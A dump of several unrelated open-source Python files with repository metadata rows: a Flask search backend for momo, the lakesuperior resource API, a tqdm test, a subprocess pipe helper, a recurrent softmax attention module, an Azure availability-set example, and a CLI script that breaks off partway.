] | 6 | 2018-06-08T18:49:10.000Z | 2020-09-29T23:54:38.000Z | momo/plugins/flask/search.py | shichao-an/momo | 9996bc22b1d99d379633e18e94f4815e12435898 | [
"BSD-2-Clause"
] | 3 | 2016-08-13T02:15:04.000Z | 2016-11-02T00:05:40.000Z | momo/plugins/flask/search.py | shichao-an/momo | 9996bc22b1d99d379633e18e94f4815e12435898 | [
"BSD-2-Clause"
] | 2 | 2018-06-08T18:49:12.000Z | 2018-08-07T07:17:26.000Z | # search backend
from functools import reduce  # reduce is not a builtin on Python 3

from momo.core import Node
from momo.plugins.flask.filters import get_attr
from momo.plugins.flask.utils import str_to_bool, split_by
from momo.utils import txt_type, bin_type
class SearchError(Exception):
pass
def join_terms(*args):
res = []
for arg in args:
res.append(arg.strip('/'))
return '/'.join(res)
def parse_q(s):
"""Parse the value of query string q (?q=) into a search sub-term."""
if '=' not in s:
names = s.split()
term = '/'.join(map(lambda x: 'n.name=' + x, names))
return term
else:
subterms = s.split()
res = []
for subterm in subterms:
if '=' not in subterm:
res.append('n.name=' + subterm)
else:
res.append(subterm)
term = '&'.join(res)
return term
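def _parse_q_examples():
    # Hedged sanity checks (hypothetical queries, not part of the original
    # module): bare words become name sub-terms ANDed with '/', while mixed
    # terms keep explicit pairs and are joined with '&'.
    assert parse_q('foo bar') == 'n.name=foo/n.name=bar'
    assert parse_q('a.title=foo bar') == 'a.title=foo&n.name=bar'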
def search_nodes_by_term(term, root, case_insensitive, sep):
"""
High-level function to search nodes by search term. It does three things:
1. Parse the search term into a list of lambda lists.
2. Generate a search filter function.
3. Search the nodes with the search filter function.
"""
parsed_term = parse_search_term(term, case_insensitive, sep)
search_filter = get_search_filter(parsed_term)
nodes = search_nodes(root, search_filter)
return nodes
def parse_search_term(term, case_insensitive=False, sep=None):
"""
Parse a search term and returns a list of lambdas lists.
A search term is a path-like string seperated by slash (/). The slashes
"AND" these path components together, meaning the results are those which
satisfy all of them. Each component also comprises some sub-terms, in the
form of "key1=value1&key2=value2", with each key having an optional
prefix, which can be "n[x_]." (a node object's attribute) or "a[x]." (an
attr name); the optional "x" suffix indicates whether to perform an exact
match and "_" suffix indicates that to match nodes without this node
object attribute or attr. Note that although the sub-terms are seperated
by ampersand (&), they are "OR"ed together, meaning the results are those
satisfy any of them.
"""
res = []
entities = term.split('/')
for entity in entities:
subterms = filter(lambda x: x.strip(), entity.split('&'))
lambdas = []
for subterm in subterms:
key, s = subterm.split('=')
if '.' in key:
prefix, name = key.split('.', 1)
if prefix in ('a', 'ax', 'a_'):
lambdas.append(
lambda node, name=name, s=s, prefix=prefix:
match_value(
value=get_attr(node, name),
s=s,
exact=prefix == 'ax',
without=prefix == 'a_',
case_insensitive=case_insensitive,
sep=sep,
)
)
elif prefix in ('n', 'nx', 'n_'):
lambdas.append(
lambda node, name=name, s=s, prefix=prefix:
match_value(
value=getattr(node, name, None),
s=s,
exact=prefix == 'nx',
without=prefix == 'n_',
case_insensitive=case_insensitive,
sep=sep,
)
)
else:
raise SearchError('unknown prefix {}'.format(prefix))
else:
raise SearchError('no prefix specified')
if lambdas:
res.append(lambdas)
return res
def match_value(value, s, exact=False, without=False, case_insensitive=False,
sep=None):
"""
Test whether the value of a node attribute or attr content matches the
given string s, which is retrieved from parsed term.
:param value: value of a node attribute or attr content.
:param s: a string.
:param exact: whether to do exact matches.
:param without: if True, match if value is None (meaning value does not
exist in the node).
:param case_insensitive: whether do case-insensitive matching.
:param sep: if not None, the separator is used to treat a string as a list
separated by this separator.
"""
def with_case(a):
if case_insensitive:
return a.lower()
else:
return a
def match_list(s, values):
txt_values = map(with_case, map(txt_type, values))
if exact:
return with_case(s) in txt_values
else:
for txt_value in txt_values:
if with_case(s) in with_case(txt_value):
return True
return False
if value is None:
if without:
return True
else:
return False
else:
if without:
return False
s = txt_type(s)
if isinstance(value, (txt_type, bin_type, bool, int, float, Node)):
if isinstance(value, bool):
return match_bool(value, s)
else:
if (sep is not None and
isinstance(value, (txt_type, bin_type)) and
sep in value):
values = split_by(value, sep)
return match_list(s, values)
else:
if isinstance(value, Node):
value = value.name
if exact:
return with_case(txt_type(value)) == with_case(s)
else:
return with_case(s) in with_case(txt_type(value))
else:
return match_list(s, value)
def match_bool(value, s):
"""
Test whether a boolean value matches the given string s.
"""
return value == str_to_bool(s)
def get_search_filter(lambda_lists):
"""Generate a search filter based on the lambda lists."""
def search_filter(node):
"""Evaluate node and reduce lambda_lists."""
evaluated_list = [
reduce(lambda x, y: x or y, map(lambda x: x(node), lambda_list))
for lambda_list in lambda_lists
]
return reduce(lambda x, y: x and y, evaluated_list)
return search_filter
def search_nodes(root, func=lambda x: True):
"""
Search nodes from the root in a BFS manner.
:param root: the root node.
:param func: a filtering function.
"""
nodes = []
queue = [root]
while queue:
cur_node = queue.pop(0)
for node in cur_node.node_vals:
if func(node):
nodes.append(node)
queue.append(node)
return nodes
| 32.688995 | 78 | 0.55079 | 849 | 6,832 | 4.3298 | 0.217903 | 0.044886 | 0.019587 | 0.011425 | 0.185256 | 0.134929 | 0.063112 | 0.051143 | 0.032644 | 0.032644 | 0 | 0.002062 | 0.361095 | 6,832 | 208 | 79 | 32.846154 | 0.840092 | 0.265954 | 0 | 0.311111 | 0 | 0 | 0.01637 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.081481 | false | 0.007407 | 0.02963 | 0 | 0.281481 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10c7b4e8d153e9a166fd23f1d8c092f1c7442e90 | 10,877 | py | Python | lakesuperior/api/resource.py | barmintor/lakesuperior | a1e534a56cf762e55273d2421edf5e4948c3159b | [
"Apache-2.0"
] | null | null | null | lakesuperior/api/resource.py | barmintor/lakesuperior | a1e534a56cf762e55273d2421edf5e4948c3159b | [
"Apache-2.0"
] | null | null | null | lakesuperior/api/resource.py | barmintor/lakesuperior | a1e534a56cf762e55273d2421edf5e4948c3159b | [
"Apache-2.0"
] | null | null | null | import logging
from functools import wraps
from itertools import groupby
from multiprocessing import Process
from threading import Lock, Thread
import arrow
from rdflib import Graph, Literal, URIRef
from rdflib.namespace import XSD
from lakesuperior.config_parser import config
from lakesuperior.exceptions import (
InvalidResourceError, ResourceNotExistsError, TombstoneError)
from lakesuperior.env import env
from lakesuperior.globals import RES_DELETED, RES_UPDATED
from lakesuperior.model.ldp_factory import LDP_NR_TYPE, LdpFactory
from lakesuperior.store.ldp_rs.lmdb_store import TxnManager
logger = logging.getLogger(__name__)
__doc__ = """
Primary API for resource manipulation.
Quickstart:
>>> # First import default configuration and globals—only done once.
>>> import lakesuperior.default_env
>>> from lakesuperior.api import resource
>>> # Get root resource.
>>> rsrc = resource.get('/')
>>> # Dump graph.
>>> set(rsrc.imr)
{(rdflib.term.URIRef('info:fcres/'),
rdflib.term.URIRef('http://purl.org/dc/terms/title'),
rdflib.term.Literal('Repository Root')),
(rdflib.term.URIRef('info:fcres/'),
rdflib.term.URIRef('http://www.w3.org/1999/02/22-rdf-syntax-ns#type'),
rdflib.term.URIRef('http://fedora.info/definitions/v4/repository#Container')),
(rdflib.term.URIRef('info:fcres/'),
rdflib.term.URIRef('http://www.w3.org/1999/02/22-rdf-syntax-ns#type'),
rdflib.term.URIRef('http://fedora.info/definitions/v4/repository#RepositoryRoot')),
(rdflib.term.URIRef('info:fcres/'),
rdflib.term.URIRef('http://www.w3.org/1999/02/22-rdf-syntax-ns#type'),
rdflib.term.URIRef('http://fedora.info/definitions/v4/repository#Resource')),
(rdflib.term.URIRef('info:fcres/'),
rdflib.term.URIRef('http://www.w3.org/1999/02/22-rdf-syntax-ns#type'),
rdflib.term.URIRef('http://www.w3.org/ns/ldp#BasicContainer')),
(rdflib.term.URIRef('info:fcres/'),
rdflib.term.URIRef('http://www.w3.org/1999/02/22-rdf-syntax-ns#type'),
rdflib.term.URIRef('http://www.w3.org/ns/ldp#Container')),
(rdflib.term.URIRef('info:fcres/'),
rdflib.term.URIRef('http://www.w3.org/1999/02/22-rdf-syntax-ns#type'),
rdflib.term.URIRef('http://www.w3.org/ns/ldp#RDFSource'))}
"""
def transaction(write=False):
"""
Handle atomic operations in a store.
This wrapper ensures that a write operation is performed atomically. It
also takes care of sending a message for each resource changed in the
transaction.
ALL write operations on the LDP-RS and LDP-NR stores go through this
wrapper.
"""
def _transaction_deco(fn):
@wraps(fn)
def _wrapper(*args, **kwargs):
# Mark transaction begin timestamp. This is used for create and
# update timestamps on resources.
env.timestamp = arrow.utcnow()
env.timestamp_term = Literal(env.timestamp, datatype=XSD.dateTime)
with TxnManager(env.app_globals.rdf_store, write=write) as txn:
ret = fn(*args, **kwargs)
if len(env.app_globals.changelog):
job = Thread(target=_process_queue)
job.start()
delattr(env, 'timestamp')
delattr(env, 'timestamp_term')
return ret
return _wrapper
return _transaction_deco
def _process_queue():
"""
Process the message queue on a separate thread.
"""
lock = Lock()
lock.acquire()
while len(env.app_globals.changelog):
_send_event_msg(*env.app_globals.changelog.popleft())
lock.release()
def _send_event_msg(remove_trp, add_trp, metadata):
"""
Send messages about a changed LDPR.
A single LDPR message packet can contain multiple resource subjects, e.g.
if the resource graph contains hash URIs or even other subjects. This
method groups triples by subject and sends a message for each of the
subjects found.
"""
# Group delta triples by subject.
remove_grp = groupby(remove_trp, lambda x : x[0])
remove_dict = {k[0]: k[1] for k in remove_grp}
add_grp = groupby(add_trp, lambda x : x[0])
add_dict = {k[0]: k[1] for k in add_grp}
subjects = set(remove_dict.keys()) | set(add_dict.keys())
for rsrc_uri in subjects:
logger.debug('Processing event for subject: {}'.format(rsrc_uri))
env.app_globals.messenger.send(rsrc_uri, **metadata)
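# Illustrative micro-example (not part of the original module) of the grouping
# above: given triples sorted by subject,
#
#     trp = [(s1, p1, o1), (s1, p2, o2), (s2, p1, o3)]
#     {k: list(v) for k, v in groupby(trp, lambda x: x[0])}
#     # -> {s1: [(s1, p1, o1), (s1, p2, o2)], s2: [(s2, p1, o3)]}
#
# Note that itertools.groupby only groups *consecutive* items, so the delta
# triples must arrive sorted by subject for this to be a true group-by.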
### API METHODS ###
@transaction()
def exists(uid):
"""
Return whether a resource exists (is stored) in the repository.
:param string uid: Resource UID.
"""
try:
exists = LdpFactory.from_stored(uid).is_stored
except ResourceNotExistsError:
exists = False
return exists
@transaction()
def get_metadata(uid):
"""
Get metadata (admin triples) of an LDPR resource.
:param string uid: Resource UID.
"""
return LdpFactory.from_stored(uid).metadata
@transaction()
def get(uid, repr_options={}):
"""
Get an LDPR resource.
The resource comes preloaded with user data and metadata as indicated by
the `repr_options` argument. Any further handling of this resource is done
outside of a transaction.
:param string uid: Resource UID.
:param repr_options: (dict(bool)) Representation options. This is a dict
that is unpacked downstream in the process. The default empty dict
results in default values. The accepted dict keys are:
- incl_inbound: include inbound references. Default: False.
- incl_children: include children URIs. Default: True.
- embed_children: Embed full graph of all child resources. Default: False
"""
rsrc = LdpFactory.from_stored(uid, repr_options)
# Load graph before leaving the transaction.
rsrc.imr
return rsrc
@transaction()
def get_version_info(uid):
"""
Get version metadata (fcr:versions).
"""
return LdpFactory.from_stored(uid).version_info
@transaction()
def get_version(uid, ver_uid):
"""
Get version metadata (fcr:versions).
"""
return LdpFactory.from_stored(uid).get_version(ver_uid)
@transaction(True)
def create(parent, slug, **kwargs):
r"""
Mint a new UID and create a resource.
The UID is computed from a given parent UID and a "slug", a proposed path
relative to the parent. The application will attempt to use the suggested
path but it may use a different one if a conflict with an existing resource
arises.
:param str parent: UID of the parent resource.
:param str slug: Tentative path relative to the parent UID.
:param \*\*kwargs: Other parameters are passed to the
:py:meth:`~lakesuperior.model.ldp_factory.LdpFactory.from_provided`
method.
:rtype: str
:return: UID of the new resource.
"""
uid = LdpFactory.mint_uid(parent, slug)
logger.debug('Minted UID for new resource: {}'.format(uid))
rsrc = LdpFactory.from_provided(uid, **kwargs)
rsrc.create_or_replace(create_only=True)
return uid
@transaction(True)
def create_or_replace(uid, **kwargs):
r"""
Create or replace a resource with a specified UID.
:param string uid: UID of the resource to be created or updated.
:param \*\*kwargs: Other parameters are passed to the
:py:meth:`~lakesuperior.model.ldp_factory.LdpFactory.from_provided`
method.
:rtype: str
:return: Event type: whether the resource was created or updated.
"""
return LdpFactory.from_provided(uid, **kwargs).create_or_replace()
@transaction(True)
def update(uid, update_str, is_metadata=False):
"""
Update a resource with a SPARQL-Update string.
:param string uid: Resource UID.
:param string update_str: SPARQL-Update statements.
:param bool is_metadata: Whether the resource metadata are being updated.
:raise InvalidResourceError: If ``is_metadata`` is False and the resource
        being updated is an LDP-NR.
"""
# FCREPO is lenient here and Hyrax requires it.
rsrc = LdpFactory.from_stored(uid, handling='lenient')
if LDP_NR_TYPE in rsrc.ldp_types and not is_metadata:
raise InvalidResourceError(
            'Cannot use this method to update LDP-NR content.')
delta = rsrc.sparql_delta(update_str)
rsrc.modify(RES_UPDATED, *delta)
return rsrc
@transaction(True)
def update_delta(uid, remove_trp, add_trp):
"""
Update a resource graph (LDP-RS or LDP-NR) with sets of add/remove triples.
A set of triples to add and/or a set of triples to remove may be provided.
:param string uid: Resource UID.
:param set(tuple(rdflib.term.Identifier)) remove_trp: Triples to
remove, as 3-tuples of RDFLib terms.
:param set(tuple(rdflib.term.Identifier)) add_trp: Triples to
add, as 3-tuples of RDFLib terms.
"""
rsrc = LdpFactory.from_stored(uid)
remove_trp = rsrc.check_mgd_terms(remove_trp)
add_trp = rsrc.check_mgd_terms(add_trp)
return rsrc.modify(RES_UPDATED, remove_trp, add_trp)
@transaction(True)
def create_version(uid, ver_uid):
"""
Create a resource version.
:param string uid: Resource UID.
:param string ver_uid: Version UID to be appended to the resource URI.
NOTE: this is a "slug", i.e. the version URI is not guaranteed to be the
one indicated.
:rtype: str
:return: Version UID.
"""
return LdpFactory.from_stored(uid).create_version(ver_uid)
@transaction(True)
def delete(uid, soft=True):
"""
Delete a resource.
:param string uid: Resource UID.
:param bool soft: Whether to perform a soft-delete and leave a
tombstone resource, or wipe any memory of the resource.
"""
# If referential integrity is enforced, grab all inbound relationships
# to break them.
refint = env.app_globals.rdfly.config['referential_integrity']
    inbound = True if refint else False
repr_opts = {'incl_inbound' : True} if refint else {}
children = env.app_globals.rdfly.get_descendants(uid)
if soft:
rsrc = LdpFactory.from_stored(uid, repr_opts)
ret = rsrc.bury_rsrc(inbound)
for child_uri in children:
try:
child_rsrc = LdpFactory.from_stored(
env.app_globals.rdfly.uri_to_uid(child_uri),
repr_opts={'incl_children' : False})
except (TombstoneError, ResourceNotExistsError):
continue
child_rsrc.bury_rsrc(inbound, tstone_pointer=rsrc.uri)
else:
ret = env.app_globals.rdfly.forget_rsrc(uid, inbound)
for child_uri in children:
child_uid = env.app_globals.rdfly.uri_to_uid(child_uri)
ret = env.app_globals.rdfly.forget_rsrc(child_uid, inbound)
return ret
@transaction(True)
def resurrect(uid):
"""
Reinstate a buried (soft-deleted) resource.
:param str uid: Resource UID.
"""
return LdpFactory.from_stored(uid).resurrect_rsrc()
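# Illustrative usage sketch (not part of the original module; the parent UID,
# slug and any extra kwargs required by LdpFactory.from_provided are
# assumptions): a typical round trip through this API.
#
#     from lakesuperior.api import resource
#     uid = resource.create('/', 'my_resource')
#     resource.exists(uid)       # -> True
#     resource.delete(uid)       # soft-delete; leaves a tombstone
#     resource.resurrect(uid)    # reinstate the buried resource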
| 32.085546 | 85 | 0.689069 | 1,490 | 10,877 | 4.922819 | 0.227517 | 0.031357 | 0.043626 | 0.035446 | 0.312065 | 0.256169 | 0.197001 | 0.178732 | 0.16319 | 0.147785 | 0 | 0.007866 | 0.205204 | 10,877 | 338 | 86 | 32.180473 | 0.840486 | 0.357268 | 0 | 0.205128 | 0 | 0.038462 | 0.262698 | 0.049409 | 0 | 0 | 0 | 0 | 0 | 1 | 0.108974 | false | 0 | 0.108974 | 0 | 0.314103 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10ca34a36e384eb81002bc0dd5ef92f09e6cd1e3 | 1,212 | py | Python | src/data/download/utils/test_tqdm.py | lcn-kul/conferencing-speech-2022 | 1089b2baaf2fcf3ac8ef44c65b80da2e5b2c331b | [
"MIT"
] | 1 | 2022-03-30T15:06:18.000Z | 2022-03-30T15:06:18.000Z | src/data/download/utils/test_tqdm.py | lcn-kul/conferencing-speech-2022 | 1089b2baaf2fcf3ac8ef44c65b80da2e5b2c331b | [
"MIT"
] | null | null | null | src/data/download/utils/test_tqdm.py | lcn-kul/conferencing-speech-2022 | 1089b2baaf2fcf3ac8ef44c65b80da2e5b2c331b | [
"MIT"
] | null | null | null | import time
from tqdm import tqdm
from src.data.download.utils.tqdm_write import (
tqdm_print,
tqdm_printer,
tqdm_run_parallel,
)
def func0(tqdm_name, tqdm_idx):
N = 100
with tqdm(desc=tqdm_name, total=N, position=tqdm_idx, leave=False) as pbar:
for i in range(N):
pbar.update()
time.sleep(0.05)
tqdm_print("done", tqdm_name, tqdm_idx)
def func1(tqdm_name, tqdm_idx):
N = 200
with tqdm(desc=tqdm_name, total=N, position=tqdm_idx, leave=False) as pbar:
for i in range(N):
pbar.update()
time.sleep(0.05)
tqdm_print("done", tqdm_name, tqdm_idx)
def func2(tqdm_name, tqdm_idx):
N = 600
with tqdm(desc=tqdm_name, total=N, position=tqdm_idx, leave=False) as pbar:
for i in range(N):
pbar.update()
time.sleep(0.02)
tqdm_print("done", tqdm_name, tqdm_idx)
def test_tqdm():
funcs = [func0, func1, func2]
args = [tuple() for _ in funcs]
names = ["func0", "func1", "func2"]
print("Testing tqdm...")
time.sleep(1)
with tqdm_printer(3):
tqdm_run_parallel(funcs, args, names)
print("done")
if __name__ == "__main__":
test_tqdm()
| 22.867925 | 79 | 0.617162 | 180 | 1,212 | 3.933333 | 0.283333 | 0.101695 | 0.101695 | 0.127119 | 0.581921 | 0.514124 | 0.514124 | 0.514124 | 0.470339 | 0.470339 | 0 | 0.032151 | 0.255776 | 1,212 | 52 | 80 | 23.307692 | 0.752772 | 0 | 0 | 0.358974 | 0 | 0 | 0.044554 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.102564 | false | 0 | 0.076923 | 0 | 0.179487 | 0.205128 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10ca661d82b5269b0a8ebb7b120cf2934c9a705f | 515 | py | Python | src/package_controller/library/utils/pipe_commands.py | alexseitsinger/package_controller | 0ee896986cfa17a96bf9fb6afff35dd97f0b1211 | [
"BSD-2-Clause"
] | 2 | 2020-11-24T14:16:38.000Z | 2021-03-16T19:29:45.000Z | src/package_controller/library/utils/pipe_commands.py | alexseitsinger/package_controller | 0ee896986cfa17a96bf9fb6afff35dd97f0b1211 | [
"BSD-2-Clause"
] | 2 | 2020-11-25T01:00:45.000Z | 2020-11-25T01:59:58.000Z | src/package_controller/library/utils/pipe_commands.py | alexseitsinger/package_controller | 0ee896986cfa17a96bf9fb6afff35dd97f0b1211 | [
"BSD-2-Clause"
] | null | null | null | from subprocess import Popen, PIPE
import shlex
def pipe_commands(commands):
    last_proc = None
    for command in commands:
        args = shlex.split(command)
        if last_proc is None:
            last_proc = Popen(args, stdout=PIPE, stderr=PIPE)
        else:
            prev_proc = last_proc
            last_proc = Popen(args, stdin=prev_proc.stdout, stdout=PIPE, stderr=PIPE)
            # Close the upstream stdout in the parent so SIGPIPE propagates
            # if the downstream process exits early. (The original closed only
            # the first process's stdout, which also broke the one-command case.)
            prev_proc.stdout.close()
    out, err = last_proc.communicate()
    decoded = out.decode("utf-8")
    return decoded
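# Example usage (illustrative, not part of the original module): emulate the
# shell pipeline `echo hello world | tr a-z A-Z`.
#
#     print(pipe_commands(["echo hello world", "tr a-z A-Z"]))  # HELLO WORLD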
| 28.611111 | 85 | 0.660194 | 69 | 515 | 4.782609 | 0.463768 | 0.121212 | 0.078788 | 0.10303 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002584 | 0.248544 | 515 | 17 | 86 | 30.294118 | 0.850129 | 0 | 0 | 0 | 0 | 0 | 0.009709 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.133333 | 0 | 0.266667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10cdb0831f3d47cf768cf2a8247cb721e4071727 | 1,946 | py | Python | fast_transformers/recurrent/attention/full_attention.py | jmercat/fast-transformers | 1061f2ffa09c6d74aa252389e47f76ae827b1064 | [
"MIT"
] | 4 | 2020-09-28T01:47:19.000Z | 2021-02-24T17:01:25.000Z | fast_transformers/recurrent/attention/full_attention.py | jmercat/fast-transformers | 1061f2ffa09c6d74aa252389e47f76ae827b1064 | [
"MIT"
] | null | null | null | fast_transformers/recurrent/attention/full_attention.py | jmercat/fast-transformers | 1061f2ffa09c6d74aa252389e47f76ae827b1064 | [
"MIT"
] | 1 | 2021-06-22T01:37:58.000Z | 2021-06-22T01:37:58.000Z | #
# Copyright (c) 2020 Idiap Research Institute, http://www.idiap.ch/
# Written by Angelos Katharopoulos <angelos.katharopoulos@idiap.ch>,
# Apoorv Vyas <avyas@idiap.ch>
#
"""Implement the typical softmax attention as a recurrent module to speed up
autoregressive inference. See fast_transformers.attention.full_attention ."""
from math import sqrt
import torch
from torch.nn import Dropout, Module
class RecurrentFullAttention(Module):
"""Implement the full softmax attention as a recurrent module.
Arguments
---------
softmax_temp: The temperature to use for the softmax attention.
(default: 1/sqrt(d_keys) where d_keys is computed at
runtime)
dropout_rate: The dropout rate to apply to the attention (default: 0.1)
"""
def __init__(self, softmax_temp=None, dropout_rate=0.1):
super(RecurrentFullAttention, self).__init__()
self.softmax_temp = softmax_temp
self.dropout = Dropout(dropout_rate)
def forward(self, query, key, value, memory=None):
# Extract some shapes and compute the temperature
N, H, E = query.shape
_, _, D = value.shape
softmax_temp = self.softmax_temp or 1./sqrt(E)
# Aggregate the list of keys and values
if memory is not None:
keys, values = memory
keys = torch.cat([keys, key[:, :, None]], dim=2)
values = torch.cat([values, value[:, :, None]], dim=2)
else:
keys = key[:, :, None]
values = value[:, :, None]
# Compute the unnormalized attention
QK = torch.einsum("nhe,nhse->nhs", query, keys)
# Compute the attention and the weighted average
A = self.dropout(torch.softmax(softmax_temp * QK, dim=-1))
V = torch.einsum("nhs,nhsd->nhd", A, values).contiguous()
# Make sure that what we return is contiguous
return V, [keys, values]
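# Illustrative decoding sketch (not part of the original module): the memory
# returned at each step is fed back in, so keys/values accumulate over time.
# Shapes follow the forward() contract above; `steps` is an assumed iterable
# of (query, key, value) tensors of shape (N, H, E) / (N, H, E) / (N, H, D).
#
#     attention = RecurrentFullAttention()
#     memory = None
#     for q, k, v in steps:
#         out, memory = attention(q, k, v, memory=memory)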
| 35.381818 | 79 | 0.635663 | 247 | 1,946 | 4.910931 | 0.437247 | 0.063479 | 0.037098 | 0.031327 | 0.056059 | 0.056059 | 0 | 0 | 0 | 0 | 0 | 0.009028 | 0.260021 | 1,946 | 54 | 80 | 36.037037 | 0.833333 | 0.434738 | 0 | 0 | 0 | 0 | 0.024738 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.086957 | false | 0 | 0.130435 | 0 | 0.304348 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10cdef881dc36185566ac1966c055227805cc631 | 2,797 | py | Python | examples/example_compute_availabilitysets.py | zikalino/AzurePythonExamples | 23f9c173f0736f4e7ff66dde0402ef88da4ccc8f | [
"MIT"
] | 1 | 2020-09-04T14:38:13.000Z | 2020-09-04T14:38:13.000Z | examples/example_compute_availabilitysets.py | zikalino/AzurePythonExamples | 23f9c173f0736f4e7ff66dde0402ef88da4ccc8f | [
"MIT"
] | null | null | null | examples/example_compute_availabilitysets.py | zikalino/AzurePythonExamples | 23f9c173f0736f4e7ff66dde0402ef88da4ccc8f | [
"MIT"
] | null | null | null | #-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#--------------------------------------------------------------------------
import os
from azure.mgmt.compute import ComputeManagementClient
from azure.mgmt.resource import ResourceManagementClient
from azure.common.credentials import ServicePrincipalCredentials
#--------------------------------------------------------------------------
# credentials from environment
#--------------------------------------------------------------------------
SUBSCRIPTION_ID = os.environ['AZURE_SUBSCRIPTION_ID']
TENANT_ID = os.environ['AZURE_TENANT']
CLIENT_ID = os.environ['AZURE_CLIENT_ID']
CLIENT_SECRET = os.environ['AZURE_SECRET']
#--------------------------------------------------------------------------
# variables
#--------------------------------------------------------------------------
AZURE_LOCATION = 'eastus'
RESOURCE_GROUP = "myResourceGroup"
AVAILABILITY_SET_NAME = "myAvailabilitySet"
#--------------------------------------------------------------------------
# management clients
#--------------------------------------------------------------------------
credentials = ServicePrincipalCredentials(
client_id=CLIENT_ID,
secret=CLIENT_SECRET,
tenant=TENANT_ID
)
mgmt_client = ComputeManagementClient(credentials, SUBSCRIPTION_ID)
resource_client = ResourceManagementClient(credentials, SUBSCRIPTION_ID)
#--------------------------------------------------------------------------
# resource group (prerequisite)
#--------------------------------------------------------------------------
print("Creating Resource Group")
resource_client.resource_groups.create_or_update(resource_group_name=RESOURCE_GROUP, parameters={ 'location': AZURE_LOCATION })
#--------------------------------------------------------------------------
# /AvailabilitySets/put/Create an availability set.[put]
#--------------------------------------------------------------------------
print("Create an availability set.")
BODY = {
"location": AZURE_LOCATION,
"platform_fault_domain_count": "2",
"platform_update_domain_count": "20"
}
result = mgmt_client.availability_sets.create_or_update(resource_group_name=RESOURCE_GROUP, availability_set_name=AVAILABILITY_SET_NAME, parameters=BODY)
#--------------------------------------------------------------------------
# /AvailabilitySets/get/List availability sets in a subscription.[get]
#--------------------------------------------------------------------------
print("List availability sets in a subscription.")
result = mgmt_client.availability_sets.list_by_subscription(expand="virtualMachines\\$ref")
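#--------------------------------------------------------------------------
# /AvailabilitySets/get/Get an availability set.[get]
# (illustrative addition, not part of the original example)
#--------------------------------------------------------------------------
print("Get an availability set.")
result = mgmt_client.availability_sets.get(resource_group_name=RESOURCE_GROUP, availability_set_name=AVAILABILITY_SET_NAME)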
| 42.378788 | 153 | 0.507329 | 205 | 2,797 | 6.668293 | 0.370732 | 0.066569 | 0.040966 | 0.035113 | 0.162399 | 0.115582 | 0.064375 | 0.064375 | 0 | 0 | 0 | 0.001146 | 0.064355 | 2,797 | 65 | 154 | 43.030769 | 0.521207 | 0.499821 | 0 | 0 | 0 | 0 | 0.205669 | 0.055233 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.137931 | 0 | 0.137931 | 0.103448 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10d3f9c66b9b6f1acf358bee09f3b9bcb84cc122 | 1,856 | py | Python | api.py | vladloh/acm-cli | 136ca85cffe16c350977d5bf14e5b7a86962c477 | [
"MIT"
] | null | null | null | api.py | vladloh/acm-cli | 136ca85cffe16c350977d5bf14e5b7a86962c477 | [
"MIT"
] | null | null | null | api.py | vladloh/acm-cli | 136ca85cffe16c350977d5bf14e5b7a86962c477 | [
"MIT"
] | null | null | null | import argparse
from prettytable import PrettyTable
from prettytable import from_html_one
from worker import Worker
from config import login, password, folder_path
def initialize_parser():
"""Initialize parser for CLI."""
parser = argparse.ArgumentParser(
usage='acm [command] [parameters]',
)
parser.set_defaults(func=lambda args: parser.print_help())
subparsers = parser.add_subparsers(
dest='command',
title='Commands',
metavar='<command>',
)
gen_cmd = subparsers.add_parser('gen', help='Generate new contests')
gen_cmd.set_defaults(func=generate)
submit_cmd = subparsers.add_parser('submit', help='Submit task')
submit_cmd.add_argument('path', type=str, help='File to submit')
submit_cmd.set_defaults(func=submit)
status_cmd = subparsers.add_parser('status', help='Get status of all problems in contest')
status_cmd.set_defaults(func=status)
submissions_cmd = subparsers.add_parser('submissions', help='Get status of all problems in contest')
submissions_cmd.set_defaults(func=submissions)
return parser
def get_worker():
return Worker(login, password, folder_path)
def generate(args):
w = get_worker()
res = w.update_contests()
print(res)
def submit(args):
w = get_worker()
res = w.submit_task(args.path)
print(res)
def status(args):
w = get_worker()
res = w.get_summary()
x = PrettyTable()
x.field_names = ["Problem", "Verdict"]
for i in res:
